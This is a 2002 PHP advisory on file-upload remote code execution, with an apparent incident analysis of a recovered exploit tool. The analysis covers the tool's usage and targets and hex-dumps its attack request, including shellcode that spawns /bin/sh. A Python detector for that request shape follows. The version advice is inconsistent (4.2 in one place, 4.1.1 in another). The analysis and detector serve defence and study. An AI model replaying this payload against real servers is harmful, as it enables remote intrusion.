PHP vulnerability (PHP remote vulnerabilities):
Advisory 01/2002
PHP remote vulnerabilities
Release Date: 2002/02/27
A brand-new bug in PHP3 and PHP4, in the file-upload code and originating in the php_mime_split function, lets a hacker execute arbitrary code. One important note: the weakness is not only triggered when running scripts that handle file uploads; it is triggered by any script at all!
Servers have to go all the way up to PHP 4.2 (brand new, just out) to escape this bug. It mainly affects Linux and Solaris; PHP3 is affected on every OS.
Possible PHP Exploit
Summary:
An exploit for PHP 4 was recovered, which appears to
give attackers an open shell on remote systems running a number
of different versions of PHP 4. The binary appears to use a
bug in 'rfc1867.c', which is said to be fixed in versions higher
than 4.0.6.

PHP File Upload
===============

PHP is an apache module implementing a general-purpose
scripting language. PHP code can be embedded in HTML and is
interpreted by apache whenever the page is requested.

The file 'rfc1867.c' implements the ability to upload data
files using multipart MIME forms (multipart/form-data).
http://www.faqs.org/rfcs/rfc1867.html

RFC 1867 pretty much implements standard 'multipart/mime'
syntax to upload files, and associated properties. A basic
client request will look like the following:

Content-type: multipart/form-data, boundary=(boundary string)

--(boundary string)
content-disposition: form-data; name="name_of_input_field"

filename
--(boundary string)
content-disposition: form-data; name="name_of_file_field"; filename="filename"
Content-Type: text/plain

(content of the file)
--(boundary string)--
Exploit
=======

The exploit provided to incidents.org calls itself '73501867'.
Running it without parameters reveals the following usage
instructions:

73501867 - x86/linux mod_php v4.0.2rc1-v4.0.5 remote exploit
by lorian.

usage: ./73501867 [options] <hostname> <phpfile>
Options:
-c check exploitability only, do not exploit
-f force mode, override check results
-n no check mode
-l retloc set retlocation
-a retaddr set return address
-t target choose target
(1) Debian 2.2r3 / Apache 1.3.20 / PHP 4.0.3 (GOT _estrndup)
(2) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (GOT _estrndup)
(3) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (stack)
(4) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (apache GOT kill)
(5) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (stack)
(6) CRASH ME
(7) Debian 2.2r3 / Apache 1.3.20 / PHP 4.0.5 (stack)
(8) RedHat 7.1 / apache-1.3.19-5 from RPM / PHP/4.X
(9) Mandrake 8.0 / apache-1.3.19-3mdk from RPM / PHP/4.X
The '-c' option will send a 'HEAD' request to the server and analyse the
returned string for patterns matching exploitable versions:

(from apache access log)
127.0.0.1 - - [26/Feb/2002:23:07:27 -0500] "HEAD / HTTP/1.1" 200 0 "-" "-"

Other than the fact that an empty 'HEAD' request is suspicious, there is
nothing special about this request. Unlike other web server exploits, this
exploit will take advantage of HTTP/1.1 and will allow targeting name
virtual hosts. Even if the default host does not use php, other name
virtual hosts may.

Exploit Signature
=================

Next, we ran the exploit against netcat. This time, we used the '-f -n'
options to avoid the 'HEAD' request and allow the exploit to execute
regardless of the missing response from netcat.

All the signatures are very similar to each other. As they are quite
large (approx. 77500 bytes), I will only discuss one.

0000000: 504f 5354 202f 7465 7374 2e70 6870 2048 POST /test.php H
0000010: 5454 502f 312e 310d 0a41 6363 6570 743a TTP/1.1..Accept:
0000020: 2069 6d61 6765 2f67 6966 2c20 696d 6167 image/gif, imag
0000030: 652f 782d 7862 6974 6d61 702c 2069 6d61 e/x-xbitmap, ima
0000040: 6765 2f6a 7065 672c 2069 6d61 6765 2f70 ge/jpeg, image/p
0000050: 6a70 6567 2c20 2a2f 2a0d 0a52 6566 6572 jpeg, */*..Refer
0000060: 6572 3a20 6874 7470 3a2f 2f6c 6f63 616c er: http://local
0000070: 686f 7374 2f69 6e64 6578 2e68 746d 6c0d host/index.html.
0000080: 0a41 6363 6570 742d 4c61 6e67 7561 6765 .Accept-Language
0000090: 3a20 6465 2c65 6e2d 7573 3b71 3d30 2e35 : de,en-us;q=0.5
00000a0: 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type:
00000b0: 6d75 6c74 6970 6172 742f 666f 726d 2d64 multipart/form-d
00000c0: 6174 613b 2062 6f75 6e64 6172 793d 6802 ata; boundary=h.
#
# A one byte boundary ('h') is unusual, but legal. However,
# this part may make a nice IDS signature
#
00000d0: 010d 0a41 6363 6570 742d 456e 636f 6469 ...Accept-Encodi
00000e0: 6e67 3a20 677a 6970 2c20 6465 666c 6174 ng: gzip, deflat
00000f0: 650d 0a55 7365 722d 4167 656e 743a 204d e..User-Agent: M
0000100: 6f7a 696c 6c61 2f34 2e30 2028 636f 6d70 ozilla/4.0 (comp
0000110: 6174 6962 6c65 3b20 4d53 4945 2035 2e35 atible; MSIE 5.5
0000120: 3b20 5769 6e64 6f77 7320 4e54 2035 2e30 ; Windows NT 5.0
0000130: 290d 0a48 6f73 743a 206c 6f63 616c 686f )..Host: localho
0000140: 7374 0d0a 436f 6e74 656e 742d 4c65 6e67 st..Content-Leng
0000150: 7468 3a20 3737 3137 330d 0a43 6f6e 6e65 th: 77173..Conne
0000160: 6374 696f 6e3a 204b 6565 702d 416c 6976 ction: Keep-Aliv
0000170: 650d 0a43 6163 6865 2d43 6f6e 7472 6f6c e..Cache-Control
0000180: 3a20 6e6f 2d63 6163 6865 0d0a 0d0a 2d2d : no-cache....--
0000190: 6802 010d 0a43 6f6e 7465 6e74 2d44 6973 h....Content-Dis
00001a0: 706f 7369 7469 6f6e 3a20 666f 726d 2d64 position: form-d
00001b0: 6174 613b 206e 616d 653d 22cc cccc cccc ata; name=".....
00001c0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001d0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001e0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001f0: cccc cccc cccc cccc cccc cccc cccc cccc ................
0000200: cccc cccc cccc cccc cccc cccc cccc cc00 ................
0000210: 0000 0000 0000 005c 4628 4000 0000 00cc .......\F(@.....
0000220: cccc cccc cccc cccc cccc cccc cccc cccc ................
#
# a number of identical lines omitted. Realize that the
# 'name' parameter is very large. No idea what the sequence
# of '00' \F(@ '00' is about.
#
# The content length given in the header appears right.
#
00002c0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00002d0: cccc cc22 3b20 6669 6c65 6e61 6d65 3d22 ..."; filename="
00002e0: eb0c eb0c eb0c eb0c eb0c eb0c eb0c eb0c ................
#
# again, I omitted a number of identical lines. A lot this
# time (see byte counter), followed by what could be shell
# code at the end.
#
00104c0: eb0c eb0c eb0c eb0c eb0c eb0c eb0c eb0c ................
00104d0: eb0c eb0c 31c0 50b0 1bcd 808b e531 dbf7 ....1.P......1..
00104e0: e3b0 1bcd 8060 89e2 6a20 5452 31c9 5159 .....`..j TR1.QY
00104f0: 4151 89e1 6a07 5b6a 6658 cd80 09c0 75ef AQ..j.[jfX....u.
0010500: 803a 0275 ea5b 31c9 b03f cd80 fec1 b03f .:.u.[1..?.....?
0010510: cd80 fec1 b03f cd80 b00b 9952 686e 2f73 .....?.....Rhn/s
0010520: 6868 2f2f 6269 89e3 5253 89e1 cd80 cc0c hh//bi..RS......
0010530: 220d 0a43 6f6e 7465 6e74 2d54 7970 653a "..Content-Type:
0010540: 2074 6578 742f 706c 6169 6e0d 0acc cccc text/plain.....
0010550: cccc cccc cccc cccc cccc cccc cccc cccc ................
(again, omitted a lot of lines)
0012c40: cccc cccc cccc cccc cccc cccc cccc cccc ................
0012c50: cccc cccc cccc cccc cccc cccc cc0d 0a2d ...............-
0012c60: 2d68 0201 0d0a 436f 6e74 656e 742d 4469 -h....Content-Di
0012c70: 7370 6f73 6974 696f 6e3a 2066 6f72 6d2d sposition: form-
0012c80: 6461 7461 3b20 6e61 6d65 3d22 cccc cccc data; name="....
0012c90: cccc cccc cccc cccc cccc cccc cccc cccc ................
(over long 'name')
0012ef0: cccc cccc cccc cccc cccc cccc 220d 0a20 ............"..
0012f00: 0d0a 20 ..

Conclusion
==========

Exploit or hoax? I was not quite able to get it to work on
either RH 7.1 or 7.2. However, in RH 7.1 the exploit appeared
to provide a shell (however, the shell was not able to execute
anything). This exploit may be very sensitive to particular
apache/php configurations.
Upgrading to php 4.1.1 appears to be the safe bet at this point.
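The multipart/form-data layout from the 'PHP File Upload' section and the captured request discussed under 'Exploit Signature', as an added example that is not part of the incidents.org write-up and not PHP's own rfc1867.c code: a small parser for the format, plus heuristics that flag the shape of the captured request (a three-byte boundary containing control bytes, an oversized name parameter, and a filename field filled with the repeated eb 0c byte pair). The function names, the thresholds, and the two sample requests are this example's own assumptions; the suspicious sample copies only the structure of the capture, not its payload bytes.

```python
import re

# Thresholds are assumptions chosen for this example, not values from the write-up.
MAX_NAME_LEN = 256              # form field names longer than this are flagged
MAX_FILENAME_LEN = 256          # likewise for upload filenames
MIN_BOUNDARY_LEN = 4            # the captured exploit used the three-byte boundary 'h\x02\x01'
SLED_PATTERN = b'\xeb\x0c' * 8  # the byte pair that fills the captured filename field


def parse_boundary(content_type):
    """Return the boundary token from a Content-Type value; accepts both the
    ';' and the ',' separator (the write-up's sample request uses a comma)."""
    m = re.search(rb'boundary=([^;,\r\n]+)', content_type)
    if not m:
        raise ValueError('no boundary parameter in Content-Type')
    return m.group(1).strip(b' \t"')


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts.
    Each part is {'headers': {lowercased name: value}, 'data': bytes}."""
    parts = []
    for chunk in body.split(b'--' + boundary)[1:]:
        if chunk.startswith(b'--'):
            break                      # closing delimiter '--boundary--'
        if chunk.startswith(b'\r\n'):
            chunk = chunk[2:]
        head, sep, data = chunk.partition(b'\r\n\r\n')
        if not sep:
            raise ValueError('part without a blank line after its headers')
        if data.endswith(b'\r\n'):
            data = data[:-2]           # CRLF that precedes the next delimiter
        headers = {}
        for line in head.split(b'\r\n'):
            k, _, v = line.partition(b':')
            headers[k.strip().lower()] = v.strip()
        parts.append({'headers': headers, 'data': data})
    return parts


def disposition_params(value):
    """Pull quoted parameters (name="...", filename="...") out of a Content-Disposition value."""
    return {m.group(1).decode(): m.group(2)
            for m in re.finditer(rb'(\w+)="([^"]*)"', value)}


def check_request(raw):
    """Parse a raw HTTP request and return a list of findings; an empty list
    means nothing matched the shape of the captured exploit request."""
    head, _, body = raw.partition(b'\r\n\r\n')
    content_type = b''
    for line in head.split(b'\r\n')[1:]:
        k, _, v = line.partition(b':')
        if k.strip().lower() == b'content-type':
            content_type = v.strip()
    if not content_type.lower().startswith(b'multipart/form-data'):
        return []
    findings = []
    boundary = parse_boundary(content_type)
    if any(byte < 0x20 or byte > 0x7e for byte in boundary):
        findings.append('boundary contains non-printable bytes')
    if len(boundary) < MIN_BOUNDARY_LEN:
        findings.append('boundary shorter than %d bytes' % MIN_BOUNDARY_LEN)
    for part in parse_multipart(body, boundary):
        params = disposition_params(part['headers'].get(b'content-disposition', b''))
        name = params.get('name', b'')
        filename = params.get('filename', b'')
        if len(name) > MAX_NAME_LEN:
            findings.append('name parameter is %d bytes' % len(name))
        if len(filename) > MAX_FILENAME_LEN:
            findings.append('filename parameter is %d bytes' % len(filename))
        if SLED_PATTERN in filename:
            findings.append('filename contains the repeated eb 0c pattern')
    return findings


def build_request(path, boundary, fields):
    """Assemble a POST with a multipart/form-data body from
    (name, filename-or-None, data) tuples. Used only for constructed samples."""
    body = b''
    for name, filename, data in fields:
        body += b'--' + boundary + b'\r\n'
        body += b'Content-Disposition: form-data; name="' + name + b'"'
        if filename is not None:
            body += b'; filename="' + filename + b'"\r\nContent-Type: text/plain'
        body += b'\r\n\r\n' + data + b'\r\n'
    body += b'--' + boundary + b'--\r\n'
    return (b'POST ' + path + b' HTTP/1.1\r\nHost: localhost\r\n'
            b'Content-Type: multipart/form-data; boundary=' + boundary + b'\r\n'
            b'Content-Length: ' + str(len(body)).encode() + b'\r\n\r\n' + body)


# Constructed samples: an ordinary upload, and one with the structure of the
# captured request (three-byte boundary, oversized name, filename of eb 0c pairs).
BENIGN = build_request(b'/upload.php', b'----ExampleBoundary7d9a1',
                       [(b'user', None, b'alice'),
                        (b'userfile', b'notes.txt', b'hello world')])
SUSPICIOUS = build_request(b'/test.php', b'h\x02\x01',
                           [(b'\xcc' * 2000, b'\xeb\x0c' * 600, b'\xcc' * 64)])

if __name__ == '__main__':
    for label, req in (('benign', BENIGN), ('suspicious', SUSPICIOUS)):
        print(label, check_request(req) or 'no findings')
```

The checks deliberately key on structure rather than on the exact bytes of the capture: a control-byte boundary, a name parameter far beyond anything a form would produce, and a long run of one byte pair in the filename are what a parser sees before any version-specific detail matters, so a signature built on them survives small changes to the tool's buffers.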